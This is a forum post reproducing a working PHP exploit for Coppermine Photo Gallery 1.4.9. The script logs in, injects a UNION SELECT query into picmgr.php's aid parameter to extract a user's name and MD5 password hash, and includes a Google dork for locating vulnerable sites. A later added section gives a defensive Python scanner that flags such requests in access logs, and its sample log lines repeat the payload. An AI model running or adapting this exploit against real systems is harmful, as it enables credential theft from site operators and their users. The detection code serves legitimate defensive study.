Coppermine Photo Gallery 1.4.9 Remote SQL Injection Vulnerability
epic
User

Registered: 18 years ago
Posts: 1896


Code:

#!/usr/bin/php
<?php

 /*********************************************************************
 * Coppermine Photo Gallery 1.4.9 Remote SQL Injection Vulnerability
 *
 * Note:
 * Requires a valid user account.
 *
 * Usage:
 * php script.php [host] [path] [table prefix] [user id] [username] [password]
 *
 * Usage Example:
 * php script.php domain.com /coppermine/ cpg149_ 1 john secret
 *
 * Googledork:
 * "Powered by Coppermine Photo Gallery"
 *
 * Credits:
 * Disfigure - Vulnerability research and discovery
 * Synsta - Exploit scripting
 *
 * [w4ck1ng] - w4ck1ng.com
 *********************************************************************/

if(!isset($argv[6])){
die("Usage:
php $argv[0] [host] [path] [table prefix] [user id] [username] [password]\n
Usage Example:
php $argv[0] domain.com /coppermine/ cpg149_ 1 john secret\n");
}

if(isset($argv[6])){

// Send a raw HTTP request to port 80 and append the full response to the global $data buffer.
function send($host,$put){
global $data;
$conn = fsockopen(gethostbyname($host),80);
if(!$conn) {
die("Connection to $host failed...");
}else{
fputs($conn,$put);
}
while(!feof($conn)) {
$data .=fgets($conn);
}
fclose($conn);
return $data;
}

$host = $argv[1];
$path = $argv[2];
$prefix = $argv[3];
$userid = $argv[4];
$userl = $argv[5];
$passl = $argv[6];

// Step 1: log in with the supplied account so the response carries a session cookie.
$post = "username=".urlencode($userl)."&password=".urlencode($passl)."&submitted=Login";
$req  = "POST ".$path."login.php?referer=index.php HTTP/1.1\r\n";
$req .= "Referer: http://".$host.$path."login.php?referer=index.php\r\n";
$req .= "Host: $host\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Content-Length: ".strlen($post)."\r\n";
$req .= "Connection: Close\r\n";
$req .= "Cache-Control: no-cache\r\n\r\n";
$req .= $post;
send("$host","$req");

/* Borrowed from rgod. */
// Pull the first two Set-Cookie values out of the login response.
$temp = explode("Set-Cookie: ",$data);
$temp2 = explode(" ",$temp[1]);
$cookie = $temp2[0];
$temp2 = explode(" ",$temp[2]);
$cookie .= " ".str_replace(";","",$temp2[0]);
$cookie = str_replace("\r","",$cookie);
$cookie = str_replace("\n","",$cookie);

// Step 2: request picmgr.php with the injected aid parameter, reusing the session cookie.
$sql = urlencode("123 UNION SELECT user_id,user_group,concat(user_name,char(58,58),user_password) FROM ".$prefix."users where user_id = ".$userid." --");
$req =  "GET ".$path."picmgr.php?aid="."$sql HTTP/1.1\r\n";
$req .= "Host: $host\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Cookie: ".$cookie."\r\n";
$req .= "Connection: Close\r\n\r\n";
send("$host","$req");

// Step 3: the injected row is reflected inside an <option> tag; carve out the name::hash pair.
$gdata = explode("<option value=\"picture_no=1,picture_nm=",$data);
$ghash = explode(",action=0\">",$gdata[1]);
$hash = $ghash[0];
$uname = explode("'",$hash);
$uname = explode("::",$uname[1]);
$username = $uname[0];
$fhash = explode("::",$hash);
$fhash = explode("',picture_sort=100",$fhash[1]);
$finalhash = $fhash[0];

if(strlen($finalhash) != 32){
die("Exploit failed..\n");
}else{
die("Username: $username MD5: $finalhash\n");
}
}
?>

# milw0rm.com [2006-10-27]



_______________________________________
:< 4 8 15 16 23 42 *execute*
EVERYONE IS INVITED TO THE NEW FORUM!

posted 18 years ago
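From the defender's side, the request this script sends stands out in web-server access logs, because picmgr.php only ever takes a numeric album id in aid. The Python below is an added example, not part of the original post or of Coppermine: it parses constructed Apache-style log lines (the IPs, timestamps and sizes are made up) and flags any picmgr.php request whose aid is not a plain integer, naming the SQL keywords when it sees them.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines for the demo; IPs, times and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Oct/2006:10:00:01 +0000] "GET /coppermine/picmgr.php?aid=12 HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Oct/2006:10:00:07 +0000] "GET /coppermine/picmgr.php?aid=123+UNION+SELECT+user_id%2Cuser_group%2Cconcat%28user_name%2Cchar%2858%2C58%29%2Cuser_password%29+FROM+cpg149_users+where+user_id+%3D+1+-- HTTP/1.1" 200 5120 "-" "-"
10.0.0.9 - - [27/Oct/2006:10:00:08 +0000] "GET /coppermine/picmgr.php?aid=1%27 HTTP/1.1" 500 311 "-" "-"
10.0.0.5 - - [27/Oct/2006:10:00:09 +0000] "POST /coppermine/login.php?referer=index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# ip, ident, user, [timestamp], "METHOD target PROTOCOL", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Keywords the injected payload relies on, checked case-insensitively on the decoded value.
SQLI_RE = re.compile(r'\b(union\s+select|concat\s*\(|char\s*\()', re.IGNORECASE)


def check_line(line):
    """Return a finding dict for one log line, or None when the request looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/picmgr.php"):
        return None
    # parse_qs decodes '+' and %XX, so the payload is inspected in its decoded form
    for aid in parse_qs(url.query, keep_blank_values=True).get("aid", []):
        if aid.isdigit():  # a legitimate album id is all digits
            continue
        reason = "sql keywords in aid" if SQLI_RE.search(aid) else "non-numeric aid"
        return {"ip": m.group("ip"), "ts": m.group("ts"), "status": int(m.group("status")),
                "aid": aid, "reason": reason}
    return None


def scan(log_text):
    """Run check_line over every line of a log and collect the findings."""
    return [f for f in map(check_line, log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} {f['reason']}: {f['aid'][:60]}")
```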